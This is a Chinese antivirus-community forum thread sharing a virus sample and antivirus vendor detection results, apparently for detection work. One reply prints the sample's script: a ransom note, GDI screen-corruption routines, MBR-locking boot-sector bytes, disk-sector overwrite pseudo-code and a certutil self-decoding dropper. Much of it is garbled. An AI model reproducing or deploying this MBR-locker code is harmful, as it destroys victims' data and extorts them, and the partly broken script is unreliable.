楼主: xiaobao233
收起左侧

[病毒样本] 1x,vt仅ESET报,火绒报

[复制链接]
wwwab
发表于 2021-12-18 15:28:46 | 显示全部楼层
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off
  2. goto setup
  3. :3
  4. %EnityPoint% 2
  5. title DISK MURDERER
  6. set Note {

  7. Hello....
  8. ALL YOUR DATA IN HARD DISK IS MURDERED BY ME

  9. I destroyed your computer just now! You can't use PE to recover your data  because all your disk data has been overwritten!
  10. Try to restart or shut down will immediately destroy your data!

  11. Of course, don't worry.
  12. You can safely recover all your data.
  13. You need to pay me ransom. I will send you an unlock password.
  14. Enter your password below to recover your data. If the password is correct, you can start recovery immediately!

  15. Ransom: 2$

  16. Email:ceeyourbac@126.com
  17. Enjoy the last time of you whit your computer!

  18. Creator: ceeyourbac

  19. };
  20. #pragma comment(lib,"Shlwapi.lib")
  21. #pragma  comment(lib,"WinMM.lib")
  22. using namespace std;
  23. HCRYPTPROV prov;
  24. int random() {
  25.         if (prov == NULL)
  26.                 if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
  27.                         ExitProcess(1);

  28.         int out;
  29.         CryptGenRandom(prov, sizeof(out), (BYTE*)(&out));
  30.         return out & 0x7fffffff;
  31. }
  32. POINT mkp(int x, int y) {
  33.         POINT p;
  34.         p.x = x;
  35.         p.y = y;
  36.         return p;
  37. }
  38. #define thread(name) DWORD WINAPI name(LPVOID lpParam)
  39. #define rt(thrdname) CreateThread(NULL, 0, thrdname, NULL, 0, NULL);
  40. DWORD WINAPI pat(LPVOID lpParameter) {
  41.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  42.         HDC hdc = GetDC(NULL);
  43.         for (;;) {
  44.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  45.                 PatBlt(hdc, 0, 0, w, h, PATINVERT);
  46.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  47.                 PatBlt(hdc, 50, 50, w - 100, h - 100, PATINVERT);
  48.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  49.                 PatBlt(hdc, 100, 100, w - 200, h - 200, PATINVERT);
  50.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  51.                 PatBlt(hdc, 150, 150, w - 300, h - 300, PATINVERT);
  52.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  53.                 PatBlt(hdc, 200, 200, w - 400, h - 400, PATINVERT);
  54.                 SelectObject(hdc, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  55.                 PatBlt(hdc, 250, 250, w - 500, h - 500, PATINVERT);
  56.         }
  57.         return 0;
  58. }
  59. DWORD WINAPI wave(LPVOID lpParameter) {
  60.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  61.         HDC hdc = GetDC(NULL);
  62.         HDC hcdc = CreateCompatibleDC(hdc);
  63.         HBITMAP hBitmap = CreateCompatibleBitmap(hdc, w, h);
  64.         SelectObject(hcdc, hBitmap);
  65.         for (;;) {
  66.                 StretchBlt(hcdc, 0, 0, w, h, hdc, 0, 0, w, h, SRCCOPY);
  67.                 int r = h / 2;
  68.                 for (int i = 0; i <= r; i += 5) {
  69.                         int d = sqrt(float(2 * r * i - i * i));
  70.                         StretchBlt(hcdc, -d / 3, i, w, 5, hdc, 0, i, w, 5, SRCCOPY);
  71.                 }
  72.                 for (int i = 0; i <= r; i += 5) {
  73.                         int d = sqrt(float(2 * r * (r - i) - (r - i) * (r - i)));
  74.                         StretchBlt(hcdc, -d / 3, i + r, w, 5, hdc, 0, i + r, w, 5, SRCCOPY);
  75.                 }
  76.                 StretchBlt(hdc, 0, 0, w, h, hcdc, 0, 0, w, h, SRCCOPY);
  77.                 Sleep(10);
  78.         }
  79. }
  80. DWORD WINAPI _Ellipse(LPVOID lpParameter) {
  81.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  82.         HDC hdc = GetDC(NULL);
  83.         int i = 0;
  84.         int n = 50;
  85.         int x = random() % (w - 400);
  86.         int y = random() % (h - 400);
  87.         for (int cnt = 0; cnt < 50; cnt++) {
  88.                 if (n >= 450) {
  89.                         x = random() % (w - 400);
  90.                         y = random() % (h - 400);
  91.                         n = 50;
  92.                         i = 0;

  93.                 }
  94.                 HDC hcdc = CreateCompatibleDC(hdc);
  95.                 BitBlt(hcdc, 0, 0, w, h, hdc, 0, 0, SRCCOPY);
  96.                 HBITMAP hBitmap = CreateCompatibleBitmap(hdc, w, h);
  97.                 SelectObject(hcdc, hBitmap);
  98.                 BitBlt(hcdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY);
  99.                 HBRUSH hBrush = CreatePatternBrush(hBitmap);
  100.                 SelectObject(hdc, hBrush);
  101.                 for (; i <= n; i += 10) {
  102.                         Ellipse(hdc, x - i, y - i, x + i, y + i);
  103.                         Sleep(20);
  104.                 }
  105.                 DeleteObject(hBrush);
  106.                 DeleteObject(hBitmap);
  107.                 n += 50;
  108.         }
  109.         return 0;
  110. }
  111. DWORD WINAPI Stretch(LPVOID lpParameter) {
  112.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  113.         HDC hdc = GetDC(NULL);
  114.         for (int i = 0; i < 1200; i++) {
  115.                 int _w = random() % 100 + 400, _h = random() % 100 + 400;
  116.                 int x = random() % (w - _w), y = random() % (h - _h);
  117.                 StretchBlt(hdc, x + (5 - random() % 10), y + (5 - random() % 10), _w + (5 - random() % 10), _h + (5 - random() % 10), hdc, x, y, _w, _h, SRCCOPY);
  118.                 StretchBlt(hdc, x + (5 - random() % 10), y + (5 - random() % 10), _w + (5 - random() % 10), _h + (5 - random() % 10), hdc, x, y, _w, _h, SRCCOPY);
  119.                 StretchBlt(hdc, x + (5 - random() % 10), y + (5 - random() % 10), _w + (5 - random() % 10), _h + (5 - random() % 10), hdc, x, y, _w, _h, SRCCOPY);
  120.         }
  121.         return 0;
  122. }
  123. void _DrawError(bool x) {
  124.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  125.         int icnsz = GetSystemMetrics(SM_CXICON);
  126.         HDC hdc = GetDC(NULL);
  127.         POINT p;
  128.         if (x) {
  129.                 p = mkp(0, random() % h);
  130.         }
  131.         else {
  132.                 p = mkp(random() % w, 0);
  133.         }
  134.         for (;;) {
  135.                 if (p.x >= w || p.y >= h) {
  136.                         return;
  137.                 }
  138.                 DrawIcon(hdc, p.x, p.y, LoadIcon(NULL, IDI_ERROR));
  139.                 p.x += icnsz;
  140.                 p.y += icnsz;
  141.                 Sleep(50);
  142.         }
  143.         return;
  144. }
  145. DWORD WINAPI DrawError(LPVOID lpParameter) {
  146.         for (int i = 0; i < 30; i++) {
  147.                 _DrawError(random() % 2);
  148.         }
  149.         return 0;
  150. }
  151. DWORD WINAPI CopyCur(LPVOID lpParameter) {
  152.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  153.         HDC hdc = GetDC(NULL);
  154.         for (;;) {
  155.                 CURSORINFO pci;
  156.                 pci.cbSize = sizeof(pci);
  157.                 GetCursorInfo(&pci);
  158.                 for (int i = 1; i <= 20; i++)
  159.                         DrawIcon(hdc, random() % w, random() % h, pci.hCursor);
  160.                 Sleep(500);
  161.         }
  162.         return 0;
  163. }
  164. DWORD WINAPI Tunnel(LPVOID lpParameter) {
  165.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  166.         HDC hdc = GetDC(NULL);
  167.         for (int i = 0; i < 100; i++) {
  168.                 POINT ps[3] = { mkp(0,h / 8), mkp(w - (w / 8),0), mkp(w / 8, h) };
  169.                 PlgBlt(hdc, ps, hdc, 0, 0, w, h, 0, 0, 0);
  170.                 Sleep(100);
  171.         }
  172.         return 0;
  173. }
  174. DWORD WINAPI MoveDesk(LPVOID lpParameter) {
  175.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  176.         HDC hdc = GetDC(NULL);
  177.         HDC hcdc = CreateCompatibleDC(hdc);
  178.         HBITMAP hBitmap = CreateCompatibleBitmap(hdc, w, h);
  179.         SelectObject(hcdc, hBitmap);
  180.         for (int i = 0; i <= 100; i++) {
  181.                 BitBlt(hcdc, 0, 0, w / 10, h, hdc, w / 10 * 9, 0, SRCCOPY);
  182.                 BitBlt(hcdc, w / 10, 0, w / 10 * 9, h, hdc, 0, 0, SRCCOPY);
  183.                 BitBlt(hdc, 0, 0, w, h, hcdc, 0, 0, SRCCOPY);
  184.         }
  185.         return 0;
  186. }
  187. DWORD WINAPI Click(LPVOID lpParameter) {
  188.         for (;;) {
  189.                 mouse_event(MOUSEEVENTF_LEFTDOWN | MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
  190.                 mouse_event(MOUSEEVENTF_RIGHTDOWN | MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0);
  191.                 Sleep(200);
  192.                 keybd_event(16, 0, 0, 0);
  193.                 Sleep(200);
  194.                 keybd_event(16, 0, KEYEVENTF_KEYUP, 0);
  195.                 Sleep(200);
  196.                 keybd_event(random() % 26 + 65, 0, 0, 0);
  197.         }
  198.         return 0;
  199. }
  200. DWORD WINAPI gray(LPVOID lpParameter) {
  201.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  202.         HDC hdc = GetDC(NULL);
  203.         HDC hcdc = CreateCompatibleDC(hdc);
  204.         HBITMAP hBitmap = CreateCompatibleBitmap(hdc, w / 2, h / 1);
  205.         SelectObject(hcdc, hBitmap);
  206.         for (;;) {
  207.                 StretchBlt(hcdc, 0, 0, w / 2, h / 1, hdc, 0, 0, w, h, SRCCOPY);
  208.                 for (int i = 0; i < w / 2; i++) {
  209.                         for (int j = 0; j < h / 1; j++) {
  210.                                 int r = GetRValue(GetPixel(hcdc, i, j));
  211.                                 int g = GetGValue(GetPixel(hcdc, i, j));
  212.                                 int b = GetBValue(GetPixel(hcdc, i, j));
  213.                                 SetPixel(hcdc, i, j, RGB((r + g + b) / 3, (r + g + b) / 3, (r + g + b) / 3));
  214.                         }
  215.                 }
  216.                 StretchBlt(hdc, 0, 0, w, h, hcdc, 0, 0, w / 2, h / 1, SRCCOPY);
  217.                 Sleep(250);
  218.         }
  219.         return 0;
  220. }
  221. DWORD WINAPI triangle(LPVOID lpParameter) {
  222.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  223.         HDC hdc = GetDC(NULL);
  224.         HDC hcdc = CreateCompatibleDC(hdc);
  225.         HBITMAP hBitmap = CreateCompatibleBitmap(hdc, 50, 50);
  226.         SelectObject(hcdc, hBitmap);
  227.         //HDC hcdc2 = CreateCompatibleDC(hdc);
  228.         //HBITMAP hBitmap2 = CreateCompatibleBitmap(hdc, w, h);
  229.         //SelectObject(hcdc2, hBitmap2);
  230.         for (int i = 0; i < 50; i++) {
  231.                 for (int j = 0; j < 50; j++) {
  232.                         SetPixel(hcdc, i, j, RGB(random() % 256, random() % 256, random() % 256));
  233.                 }
  234.         }
  235.         HBRUSH hBrush = CreatePatternBrush(hBitmap);
  236.         SelectObject(/*hcdc2*/hdc, hBrush);
  237.         int numx = w / 150;
  238.         if (w % 150 != 0) {
  239.                 numx++;
  240.         }
  241.         int numy = h / 150;
  242.         if (h % 150 != 0) {
  243.                 numy++;
  244.         }
  245.         WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 };

  246.         HWAVEOUT hwo;
  247.         waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL);

  248.         const int bufsize = 44100 * 10;
  249.         char* wavedata = (char*)LocalAlloc(0, bufsize);

  250.         WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 };
  251.         waveOutPrepareHeader(hwo, &hdr, sizeof(hdr));
  252.         for (;;) {
  253.                 for (int i = 0; i < bufsize; i++) {
  254.                         wavedata[i] = (unsigned char)((i % 257) / 2 + 100);
  255.                 }

  256.                 waveOutWrite(hwo, &hdr, sizeof(hdr));

  257.                 //BitBlt(hcdc2, 0, 0, w, h, hdc, 0, 0, SRCCOPY);

  258.                 for (int i = 0; i <= numx; i++) {
  259.                         for (int j = 0; j <= numy; j++) {
  260.                                 POINT pt[] = { mkp(150 * i, 150 * j), mkp(150 * i + 150, 150 * j), mkp(150 * i, 150 * j + 150) };
  261.                                 Polygon(/*hcdc2*/hdc, pt, 3);
  262.                         }
  263.                 }

  264.                 //BitBlt(hdc, 0, 0, w, h, hcdc2, 0, 0, SRCCOPY);
  265.         }
  266.         return 0;
  267. }
  268. LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) {
  269.         if (nCode == HCBT_CREATEWND) {
  270.                 CREATESTRUCT* pcs = ((CBT_CREATEWND*)lParam)->lpcs;
  271.                 int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  272.                 if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) {
  273.                         HWND hwnd = (HWND)wParam;
  274.                         int x = random() % (w - pcs->cx);
  275.                         int y = random() % (h - pcs->cy);

  276.                         pcs->x = x;
  277.                         pcs->y = y;
  278.                 }
  279.         }

  280.         return CallNextHookEx(0, nCode, wParam, lParam);
  281. }
  282. DWORD WINAPI MessageThread(LPVOID parameter) {
  283.         HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
  284.         string Message;
  285.         for (int i = 0; i < 20; i++) {
  286.                 Message[i] = (char)(33 + random() % 94);
  287.         }
  288.         MessageBox(NULL, Message.c_str(), Message.c_str(), MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
  289.         UnhookWindowsHookEx(hook);

  290.         return 0;
  291. }
  292. DWORD WINAPI MSGBX(LPVOID parameter) {
  293.         for (;;) {
  294.                 CreateThread(NULL, 4096, &MessageThread, NULL, NULL, NULL);
  295.                 Sleep(2000);
  296.         }
  297. }
  298. DWORD WINAPI Square(LPVOID parameter) {
  299.         int w = GetSystemMetrics(SM_CXSCREEN), h = GetSystemMetrics(SM_CYSCREEN);
  300.         HDC hdc = GetDC(NULL);
  301.         for (;;) {
  302.                 RECT rect;
  303.                 rect.bottom = random() % h + 1;
  304.                 rect.top = random() % rect.bottom;
  305.                 rect.right = random() % w + 1;
  306.                 rect.left = random() % rect.right;
  307.                 FillRect(hdc, &rect, CreateSolidBrush(RGB(rand() % 256, rand() % 256, rand() % 256)));
  308.                 Sleep(100);
  309.         }
  310. }
  311. DWORD WINAPI _MSG(LPVOID parameter) {
  312.         MessageBox(NULL, "", "TOO LATE", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
  313.         return 0;
  314. }
  315. set loadA=t
  316. set loadB=se
  317. set #include=%loadB%%loadA%
  318. :: 此处是MBR数据
  319. set SectorLock {
  320.         8C C8 8E D8 8E C0 B8 00 06 BB 00 07 31 C9 BA FF FF CD 10 B8 01 13 BB 0C 00 B9 0D 00 BA 1F 0C BD 26 7C CD 10 EB FE 48 44 20 49 53 20 4C 4F 43 4B 45 44 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 31 CC 5C 00 00 00 00 01 01 05 FE 3F 03 C1 3E 00 00 43 BC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
  321. }
  322. #pragma comment(lib,"Shlwapi.lib")
  323. #pragma  comment(lib,"WinMM.lib")
  324. Write data RickAstley.png > Sector MBR
  325. for SectorNum<2000 {
  326.         Set int SertorNum=0
  327.         RemoveSectorA.dll,RemoveSector SertorNum
  328.         SectorNum = SectorNum + 1       
  329. }
  330. WriteDisk Create #SectorLock
  331. color c0
  332. echo #note
  333. for DeathMessage<3{
  334.         set /p Userinput=nul
  335.         DeathMessage=DeathMessag+1
  336. }
  337. Start Point KeBugCheckWithTf,Display("c0114514")
  338. :2
  339. net.exe session 1>NUL 2>NUL && (
  340.     goto as_admin
  341. ) || (
  342.     goto not_admin
  343. )
  344. :as_admin
  345. set v="%temp%\temp.exe"
  346. del %v% >NUL 2>NUL
  347. certutil -decode "%~f0" %v% >NUL 2>NUL
  348. start "" %v%
  349. goto 1
  350. :not_admin
  351. echo This program requires administrator permission!
  352. echo 这个程序必须使用管理员权限运行
  353. pause
  354. goto 1
  355. :setup
  356. set load=mp
  357. set EnityPoint=goto
  358. set NullPoint=to
  359. set int=3
  360. set DeathMessage=3
  361. set pointa=o
  362. set pointb=e
  363. set pointc=te
  364. %EnityPoint% 3
复制代码
846472713
发表于 2021-12-18 15:54:49 | 显示全部楼层
FSS安全
病毒样本收集者
发表于 2021-12-18 17:47:03 | 显示全部楼层
秋日之殇 发表于 2021-12-18 15:23
这种东西过不了卡巴的主动防御的。

卡巴斯基主防kill
Eset小粉絲
发表于 2021-12-21 11:05:10 | 显示全部楼层
Thank you for your submission.
The detection for this threat will be included in the next update of detection engine, expected version: 24488.

Win32/MBRlock.BS trojan

Regards,

ESET Malware Response Team


a variant of Win32/Packed.BlackMoon.A potentially unwanted application > Win32/MBRlock.BS trojan

@a27573 @ICzcz

评分

参与人数 1人气 +1 收起 理由
a27573 + 1

查看全部评分

LeeHS
发表于 2021-12-21 11:28:08 | 显示全部楼层
crowdstrike kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
网名丢失
发表于 2021-12-21 13:44:38 | 显示全部楼层
本帖最后由 网名丢失 于 2021-12-21 13:46 编辑

360杀,智量扫描不了压缩包的吗,要解压出来了才能少,压缩包又没有密码。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ICzcz
发表于 2021-12-21 20:48:46 | 显示全部楼层
Eset小粉絲 发表于 2021-12-21 11:05
a variant of Win32/Packed.BlackMoon.A potentially unwanted application > Win32/MBRlock.BS trojan ...

我怎么感觉这个样本双击会杀呢?
wwwab
发表于 2021-12-21 22:31:34 | 显示全部楼层
网名丢失 发表于 2021-12-21 13:44
360杀,智量扫描不了压缩包的吗,要解压出来了才能少,压缩包又没有密码。

智量目前暂时是不支持解包压缩包的……
wwwab
发表于 2021-12-21 22:45:32 | 显示全部楼层
Greetings,
  

Your submission has been analyzed. A corresponding record has been added to the Dr.Web virus database and will be available with the next update.


Threat: BAT.MulDrop.25, Trojan.MBRlock.318




Thank you for the cooperation.
网名丢失
发表于 2021-12-22 10:14:09 | 显示全部楼层
wwwab 发表于 2021-12-21 22:31
智量目前暂时是不支持解包压缩包的……

感觉智量真是弱啊,LINUX不杀,安卓文件不杀,压缩包不杀
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-5 11:59 , Processed in 0.088649 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表